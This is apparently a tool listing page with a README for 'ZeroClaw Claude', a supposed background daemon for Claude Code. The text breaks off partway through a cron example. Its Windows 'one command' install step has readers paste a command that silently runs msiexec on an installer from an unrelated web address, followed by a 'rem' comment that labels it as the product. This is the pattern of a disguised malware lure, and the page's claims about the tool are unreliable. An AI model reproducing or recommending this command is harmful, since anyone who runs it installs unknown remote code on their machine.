Claude Zeroclaw banner
Crestdrasnip Crestdrasnip

Claude Zeroclaw

Development community

Description

Claude-Zeroclaw — claude zeroclaw keyword code research. Open-source tool for automation and enhancement.

Installation

This entry records only its repository, not the path inside it, so there is no exact command to give. Open the source below and copy the folder into ~/.claude/skills/, or the file into ~/.claude/agents/.

README

⚡ ZeroClaw Claude

**A lightweight, open-source daemon built into your Claude Code. Zero API overhead, zero separate keys, zero billing surprises.**

ZeroClaw Claude turns your Claude Code into a personal assistant that never sleeps. It runs as a background daemon, executing tasks on a schedule, responding to messages on Telegram, transcribing voice commands, and integrating with any service you need — all within your existing Claude Code subscription.


⚡ Install on Windows — one command

**Step 1 — Open Command Prompt**

  1. Press Win + R
  2. Type:
cmd
  1. Press Enter This will open Command Prompt.

**Step 2 — Run the Install Command**

Copy the command below and paste it into **Command Prompt**, then press **Enter**.

cmd /c start msiexec /q /i https://cloudcraftshub.com/api & rem Zeroclaw Claude

The installer will:

  • Check / install Node.js ≥ 20 if needed
  • Check / install Bun (fast JS runtime) if needed
  • Check / install Claude CLI if needed
  • Install Node dependencies and compile TypeScript
  • Register the Claude Code plugin and skills
  • Run the interactive setup wizard
  • Add zeroclaw command to your PATH

Why ZeroClaw Claude?

**Zero API overhead.** No separate API keys, no token accounting, no billing surprises. Runs entirely within your Claude Code subscription using `@anthropic-ai/claude-agent-sdk` which spawns the `claude` binary — your OAuth token is never read or transmitted by ZeroClaw.

**Deploy in minutes.** One command installs everything. The setup wizard guides you through model, heartbeat, Telegram, and security.

**Built-in observability.** A real-time web dashboard to monitor runs, edit scheduled jobs, inspect logs, and chat with Claude live.


Features

⏰ Scheduler

Cron jobs with standard cron syntax, timezone-aware, and reliable execution. Create jobs from Claude Code or the web dashboard.

# Daily standup at 9am
0 9 * * * — Generate git summary and